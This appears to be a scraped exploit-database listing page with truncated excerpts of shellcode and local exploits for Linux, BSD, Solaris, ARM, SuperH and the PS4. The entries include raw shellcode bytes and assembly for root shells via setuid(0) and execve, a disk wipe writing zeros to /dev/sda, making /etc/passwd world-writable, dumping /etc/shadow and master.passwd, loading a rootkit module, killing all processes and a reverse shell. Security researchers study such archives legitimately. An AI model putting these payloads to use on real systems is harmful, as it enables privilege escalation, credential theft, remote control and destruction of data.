Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)

include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...

Sony Playstation 4 4.05 FW - Local Kernel Exploit

Exploit for bsd platform in category local exploits PS4 4.05 Kernel Exploit --- Summary In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level...

Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)

Linux/x86 - XOR encoded execve/bin/sh setuid0 setgid0 Shellcode 66 bytes. Shellcode exploit for Linx86 platform ;Title: Linux/x86 - 66 byte - execve/bin/sh - setuid0 - setgid0 - XOR encrypted ;Author: nullparasite ;Contact: [email protected] ;Category: Shellcode ;Architecture: Linux x86...

Linux/x86 - XOR encoded execve(/bin/sh) setuid(0) setgid(0) Shellcode (66 bytes)

;Title: Linux/x86 - 66 byte - execve/bin/sh - setuid0 - setgid0 - XOR encrypted ;Author: nullparasite ;Contact: email protected ;Category: Shellcode ;Architecture: Linux x86 ;Description: This shellcode, first set uid and gid to zero then call shell using execve. Also, /bin/sh defined as a XOR...

Mac OS X <= 10.2.4 DirectoryService (PATH) Local Root Exploit

No description provided by source. / OS X = 10.2.4 DirectoryService local root PATH exploit DirectoryService must be crashed prior to execution, per @stake advisory. If you discover how to crash DirectoryService e-mail me at [email protected] Neeko Oni -- Assuming DirectoryService has been...

Linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes

No description provided by source. / Title: Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes Kill all processes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes...

Tech-Source Raptor GFX PGX32 2.3.1 Config Tool Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1563/info Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems GIS, satellite imaging, pre-press imaging and general desktop use. They can also...

Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes

/ Linux/SuperH - sh4 - setuid0 ; execve"/bin/sh", NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3 mov 11,r3 40005e: 02 c7 mova...

FreeBSD/x86 encrypted setuid(0) execve /bin/sh 51 bytes

/ Title : 51 bytes FreeBSD/x86 encrypted setuid0 execve /bin/sh Date : Sun May 29 08:07:11 UTC 2011 Author; mywisdom email protected Web : devilzc0de.org Gopher: gopher://sdf.org/1/users/wisdomc0 Blog : http://myw1sd0m.blogspot.com/ Tested on: FreeBSD 8.2-RELEASE i386 special thanks to...

linux/x86 setuid(0) and dd of=/dev/sda if=/dev/zero shellcode 74 bytes

Exploit for linux/x86 platform in category shellcode ====================================================================== linux/x86 setuid0 and dd of=/dev/sda if=/dev/zero shellcode 74 bytes ====================================================================== / Title : Linux x86 shellcode...

linux/ARM - setuid(0) & kill(-1, SIGKILL) - 28 bytes

Exploit for linux/x86 platform in category shellcode ==================================================== linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes ==================================================== / Title: Linux/ARM - setuid0 & kill-1, SIGKILL - 28 bytes Kill all processes Date:...

Linux/x86-64 - setuid0 & chmod "/etc/passwd", 0777 & exit0 63 bytes

Linux/x86-64 - setuid0 & chmod "/etc/passwd", 0777 & exit0 - 63 bytes. Shellcode exploit for linx86-64 platform / Title: Linux/x86-64 - setuid0 & chmod "/etc/passwd", 0777 & exit0 - 63 bytes Date: 2010-06-17 Tested: Archlinux x8664 k2.6.33 Author: Jonathan Salwan Web: http://shell-storm.org |...

linux/x86 setuid(0) & execve("/sbin/poweroff -f") 47 bytes

Exploit for linux/x86 platform in category shellcode ========================================================== linux/x86 setuid0 & execve"/sbin/poweroff -f" 47 bytes ========================================================== include / linux/x86 ; setuid0 & execve"/sbin/poweroff -f" 47 bytes...

FreeBSD/x86 - execve(/bin/cat &amp; /etc/master.passwd) - 65 bytes

No description provided by source. ; sm4x 2008 ; /bin/cat /etc/master.passwd ; 65 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al, 0x17 int 0x80 ; --- setup /etc/master.passwd jmp short loadfile ok: pop esi ; setup /bin/cat push eax push...

BSD/x86 - execve(/bin/sh) &amp; setuid(0) - 29 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\xb0\x17" // mov $0x17,%al "\x50" // push %eax "\xcd\x80" // int $0x80 "\x50" // push %eax...

Linux/x86 - setuid(0) &amp; chmod(&quot;/tmp&quot;,111) &amp; exit(0)

No description provided by source. / Linux/x86 - setuid0 & chmod"/tmp",111 & exit0 Info reg ------------------ %eax = 23 %ebx = 0 %eax = 15 %ebx = /tmp %ecx = 111 %eax = 1 %ebx = 0 Shellcode 25 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Disassembly of...

Solaris/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (61 bytes)

Solaris/x86 - setuid0 + /bin/cat /etc/shadow Shellcode 61 bytes. Shellcode exploit for Solarisx86 platform. Tags: Metasploit Framework MSF Name = John Babio Twitter = 3vi1john SunOS opensolaris 10 5.11 i86pc i386 i86pc setuid0 /bin/cat //etc/shadow char code=...

Linux/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (67 bytes)

Linux/x86 - setuid0 + Load Kernel Module /tmp/o.o Shellcode 67 bytes. Shellcode exploit for Linuxx86 platform / The shellcode sets uid == 0 and loads the kernel module from /tmp/o.o size = 67 bytes OS = Linux i386 written by /rootteam/dev0id rootteam.void.ru [email protected] BITS 32 jmp shor...

OpenBSD/x86 - setuid(0) + Load Kernel Module (/tmp/o.o) Shellcode (74 bytes)

OpenBSD/x86 - setuid0 + Load Kernel Module /tmp/o.o Shellcode 74 bytes. Shellcode exploit for OpenBSDx86 platform / The modload shellcode setuid0 loads /tmp/o.o module very usefull if you have rootkit as kernel module in the /tmp dir Size 74 bytes OS OpenBSD /rootteam/dev0id rootteam.void.ru...

freebsd/x86 - reverse portbind /bin/sh 89 bytes

freebsd/x86 reverse portbind /bin/sh 89 bytes. Shellcode exploit for freebsdx86 platform ; sm4x - 2008 ; reverse portbind /bin/sh ; NULL free if address is. ; setuid0; socket; connect; exit; ; 89 bytes ; FreeBSD 7.0-RELEASE global start start: xor eax, eax ; --- setuid0 push eax push eax mov al,...